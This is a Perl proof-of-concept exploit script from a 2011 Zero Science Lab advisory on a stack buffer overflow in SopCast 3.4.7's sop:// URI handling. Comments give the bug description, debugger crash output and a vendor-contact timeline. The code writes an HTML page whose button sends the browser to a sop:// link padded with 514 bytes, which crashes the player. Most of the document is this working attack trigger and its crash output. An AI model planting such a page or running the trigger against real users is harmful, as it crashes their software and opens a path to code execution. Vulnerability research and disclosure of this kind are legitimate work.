#!/usr/bin/perl # # # SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC # # # Vendor: SopCast.com # Product web page: http://www.sopcast.com # Affected version: 3.4.7.45585 # # Summary: SopCast is a simple, free way to broadcast video and audio or watch # the video and listen to radio on the Internet. Adopting P2P(Peer-to-Peer) # technology, It is very efficient and easy to use. SoP is the abbreviation for # Streaming over P2P. Sopcast is a Streaming Direct Broadcasting System based # on P2P. The core is the communication protocol produced by Sopcast Team, which # is named sop://, or SoP technology. # # Desc: SopCast suffers from a stack-based buffer overflow vulnerability when # parsing the user input using the SoP protocol in sopocx.ocx module allowing # the attacker to gain system access and execute arbitrary code on the affected # machine. The issue is triggered when adding 514 bytes of string to the sop:// # protocol (GET), causing the app to open the link (channel) and crashing. The # application will crash even with 'sop://[anything]' because it fails to properly # sanitize and handle the uri segment, but with exactly 514 bytes the stack gets # overflowed, poping out the Buffer Overrun error box. Unsuccessful atempts causes # denial of service scenario. You can also edit the '<address>' element in the # favorites.xml file as the attack vector. # # # ================================================================================ # # (e50.fcc): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=01092f48 ebx=00f8e8e8 ecx=000000b7 edx=0116a7dc esi=00000001 edi=0104af88 # eip=100a350f esp=0618febc ebp=0618ffa8 iopl=0 nv up ei pl zr na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 # *** WARNING: Unable to verify checksum for C:\PROGRA~1\SopCast\sopocx.ocx # *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\SopCast\sopocx.ocx - # sopocx!DllUnregisterServer+0x9217f: # 100a350f 0fb606 movzx eax,byte ptr [esi] ds:0023:00000001=?? # ... # 0:000> d esp+400 # 0012ea78 18 10 ea 00 73 00 6f 00-70 00 3a 00 2f 00 2f 00 ....s.o.p.:././. # 0012ea88 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 0012ea98 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 0012eaa8 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 0012eab8 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 0012eac8 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 0012ead8 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 0012eae8 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # ... # 0:008> d edx+1000 # 00f2f8b0 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 00f2f8c0 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 00f2f8d0 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 00f2f8e0 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 00f2f8f0 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 00f2f900 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 00f2f910 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 00f2f920 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 0:008> d eax+2000 # 00f320e8 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 00f320f8 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 00f32108 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 00f32118 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 00f32128 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 00f32138 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 00f32148 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # 00f32158 61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00 a.a.a.a.a.a.a.a. # # ================================================================================ # # # Tested on: Microsoft Windows XP Professional SP3 (English) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Zero Science Lab - http://www.zeroscience.mk # # # Vendor status: # # [30.11.2011] Vulnerability discovered. # [01.12.2011] Contact with the vendor with sent detailed info. # [04.12.2011] No response from the vendor. # [05.12.2011] Public security advisory released. # # # Advisory ID: ZSL-2011-5063 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5063.php # # # 30.11.2011 #
use strict; my $fname = "thricer.html";
print "\n\nooooooooooooooooooooooooooooooooooooooooooooooooo\no"." "x47 ."o\n"; print "o\tSopCast 3.4.7 URI Handling BoF PoC" . " "x6 . "o\no"." "x47 ."o\no\t\t"; print "ID: ZSL-2011-5063"." "x15 ."o\no"." "x47 ."o\n"; print "o\tCopyleft (c) 2011, Zero Science Lab"." "x5 ."o\no"." "x47 ."o\n"; print "ooooooooooooooooooooooooooooooooooooooooooooooooo\n\n";
my $curiosity = "\n</center>\n</body>\n</html>"; my $unknown = "<form>\n<input type=\"button\" value=\"Push The Button!\" "; my $with = "onclick=\"exploit()\" />" . "\n</form>"; my $of = "<body bgcolor=\"#002233\">\n<br /><br />\n<center>\n"; my $fear = "</script>\n</head>\n"; my $replace = "<html>\n<head>\n<title>". "SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer". " Overflow PoC</title>\n". "<script type=\"text/javascript\">\n"; my $code = "window.location.href = \"sop://"."A"x514 ."\";\n"; my $the = "function exploit()\n{\n" . $code . "}\n";
my $payload = $replace.$the.$fear.$of.$unknown.$with.$curiosity; print "\n\n[*] Creating $fname file...\n"; open ENOUGH, ">./$fname" || die "\nCan't open $fname: $!"; print ENOUGH $payload; print "\n"; sleep 1; print "\n[.] File successfully scripted!\n\n"; close ENOUGH;
|